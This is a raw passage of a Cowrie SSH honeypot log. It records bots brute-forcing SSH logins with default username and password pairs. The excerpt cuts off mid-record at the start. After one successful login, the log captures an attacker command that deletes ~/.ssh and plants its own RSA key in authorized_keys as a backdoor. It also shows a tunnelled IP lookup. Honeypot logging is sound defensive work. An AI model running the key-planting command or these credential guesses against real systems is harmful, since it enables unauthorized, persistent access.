m","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:10:29.006076Z","src_ip":"212.227.235.229","session":"c1ca90aed869"}
{"eventid":"cowrie.login.failed","username":"george","password":"george","message":"login attempt [george/george] failed","sensor":"my-vps","timestamp":"2025-08-26T04:10:29.641269Z","src_ip":"212.227.235.229","session":"35f838b69e8a"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:10:30.976804Z","src_ip":"212.227.235.229","session":"35f838b69e8a"}
{"eventid":"cowrie.login.failed","username":"joro","password":"joro","message":"login attempt [joro/joro] failed","sensor":"my-vps","timestamp":"2025-08-26T04:10:31.411701Z","src_ip":"212.227.235.229","session":"8d5de707f949"}
{"eventid":"cowrie.login.failed","username":"psybnc","password":"psybnc","message":"login attempt [psybnc/psybnc] failed","sensor":"my-vps","timestamp":"2025-08-26T04:10:33.715267Z","src_ip":"212.227.235.229","session":"c1ca90aed869"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:10:34.514167Z","src_ip":"212.227.235.229","session":"8d5de707f949"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:10:35.820110Z","src_ip":"212.227.235.229","session":"c1ca90aed869"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54798,"dst_ip":"1.2.3.4","dst_port":22,"session":"65cd1f713905","protocol":"ssh","message":"New connection: 212.227.235.229:54798 (1.2.3.4:22) [session: 65cd1f713905]","sensor":"my-vps","timestamp":"2025-08-26T04:10:41.527228Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:10:41.603112Z","src_ip":"212.227.235.229","session":"65cd1f713905"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:10:45.293804Z","src_ip":"212.227.235.229","session":"65cd1f713905"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53868,"dst_ip":"1.2.3.4","dst_port":22,"session":"6154ec233de6","protocol":"ssh","message":"New connection: 212.227.235.229:53868 (1.2.3.4:22) [session: 6154ec233de6]","sensor":"my-vps","timestamp":"2025-08-26T04:10:46.851382Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:10:46.857698Z","src_ip":"212.227.235.229","session":"6154ec233de6"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:10:47.118906Z","src_ip":"212.227.235.229","session":"6154ec233de6"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":51312,"dst_ip":"1.2.3.4","dst_port":22,"session":"c84603c07fce","protocol":"ssh","message":"New connection: 103.217.145.104:51312 (1.2.3.4:22) [session: c84603c07fce]","sensor":"my-vps","timestamp":"2025-08-26T04:10:47.374556Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:10:47.377688Z","src_ip":"103.217.145.104","session":"c84603c07fce"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:10:47.636750Z","src_ip":"103.217.145.104","session":"c84603c07fce"}
{"eventid":"cowrie.login.success","username":"root","password":"calvin","message":"login attempt [root/calvin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:10:48.434572Z","src_ip":"212.227.235.229","session":"6154ec233de6"}
{"eventid":"cowrie.login.failed","username":"deployer","password":"deployer123","message":"login attempt [deployer/deployer123] failed","sensor":"my-vps","timestamp":"2025-08-26T04:10:48.677829Z","src_ip":"103.217.145.104","session":"c84603c07fce"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T04:10:48.840881Z","session":"6154ec233de6"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:10:49.939996Z","src_ip":"103.217.145.104","session":"c84603c07fce"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T04:10:50.275237Z","src_ip":"212.227.235.229","session":"6154ec233de6"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:10:50.626562Z","src_ip":"212.227.235.229","session":"6154ec233de6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48938,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e857664ed7b","protocol":"ssh","message":"New connection: 212.227.235.229:48938 (1.2.3.4:22) [session: 3e857664ed7b]","sensor":"my-vps","timestamp":"2025-08-26T04:10:53.271293Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:10:53.359781Z","src_ip":"212.227.235.229","session":"3e857664ed7b"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":47162,"dst_ip":"1.2.3.4","dst_port":22,"session":"88b1514cf1b0","protocol":"ssh","message":"New connection: 68.183.87.241:47162 (1.2.3.4:22) [session: 88b1514cf1b0]","sensor":"my-vps","timestamp":"2025-08-26T04:10:53.944826Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:10:53.948270Z","src_ip":"68.183.87.241","session":"88b1514cf1b0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:10:54.204380Z","src_ip":"68.183.87.241","session":"88b1514cf1b0"}
{"eventid":"cowrie.login.success","username":"root","password":"1234qwer!","message":"login attempt [root/1234qwer!] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:10:55.230989Z","src_ip":"68.183.87.241","session":"88b1514cf1b0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:10:55.771224Z","src_ip":"68.183.87.241","session":"88b1514cf1b0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:10:55.772065Z","src_ip":"68.183.87.241","session":"88b1514cf1b0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:10:55.773277Z","src_ip":"68.183.87.241","session":"88b1514cf1b0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:10:56.031135Z","src_ip":"68.183.87.241","session":"88b1514cf1b0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:10:56.657969Z","src_ip":"68.183.87.241","session":"88b1514cf1b0"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:10:56.658697Z","src_ip":"68.183.87.241","session":"88b1514cf1b0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:10:56.918383Z","src_ip":"68.183.87.241","session":"88b1514cf1b0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:10:56.919292Z","src_ip":"68.183.87.241","session":"88b1514cf1b0"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":47170,"dst_ip":"1.2.3.4","dst_port":22,"session":"81b6c83c9282","protocol":"ssh","message":"New connection: 68.183.87.241:47170 (1.2.3.4:22) [session: 81b6c83c9282]","sensor":"my-vps","timestamp":"2025-08-26T04:10:57.181963Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:10:57.182777Z","src_ip":"68.183.87.241","session":"81b6c83c9282"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:10:57.464008Z","src_ip":"68.183.87.241","session":"81b6c83c9282"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56620,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b17a79be5e2","protocol":"ssh","message":"New connection: 212.227.235.229:56620 (1.2.3.4:22) [session: 8b17a79be5e2]","sensor":"my-vps","timestamp":"2025-08-26T04:10:58.401779Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:10:58.402798Z","src_ip":"212.227.235.229","session":"8b17a79be5e2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:10:58.589532Z","src_ip":"68.183.87.241","session":"81b6c83c9282"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:10:58.745846Z","src_ip":"212.227.235.229","session":"8b17a79be5e2"}
{"eventid":"cowrie.login.failed","username":"library","password":"library","message":"login attempt [library/library] failed","sensor":"my-vps","timestamp":"2025-08-26T04:10:58.949535Z","src_ip":"212.227.235.229","session":"65cd1f713905"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:10:59.851711Z","src_ip":"68.183.87.241","session":"81b6c83c9282"}
